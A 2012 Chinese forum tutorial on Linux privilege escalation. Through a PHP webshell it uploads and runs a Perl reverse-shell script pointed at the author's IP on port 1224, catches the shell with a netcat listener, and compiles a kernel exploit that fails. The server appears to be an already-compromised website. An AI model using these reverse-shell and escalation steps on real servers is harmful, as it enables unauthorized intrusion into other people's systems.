linux溢出提权(适合刚学习linux提权的朋友)

[复制链接]
查看275 | 回复0 | 2012-4-1 19:17:11 | 显示全部楼层 |阅读模式
from:t00ls.net
作者wjs qq825680101



我也是刚接触linux,谢谢师傅sunwear的指导。

先在网站目录上传1.pl,是个反弹脚本

Phpshell执行chmod+x1.pl,给1.pl执行权限,图0




然后执行./1.pl本机IP1224



然后本机监听nc-vv-l-p1224,图1反弹成功






输入id

bash-3.2$id

uid=529(zeicom)gid=525(zeicom)groups=525(zeicom)

bash-3.2$

这里uid=529(zeicom)还不是root权限,输入uname–r

返回:2.6.18-164.11.1.el5PAE



找对应的exp,这里地址整理很齐全可以这里下

cc–o22.c  //把2.c编译成可执行文件

chmod+x2//给2有执行权限

./2//执行2,2是溢出的exp文件。图2






看图可以发现没提权成功,过程就是这样。以后遇到linux可以这样提权。不会linux提权的朋友可以学习下,会有所收获的。



反弹脚本

 





1.zip




*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则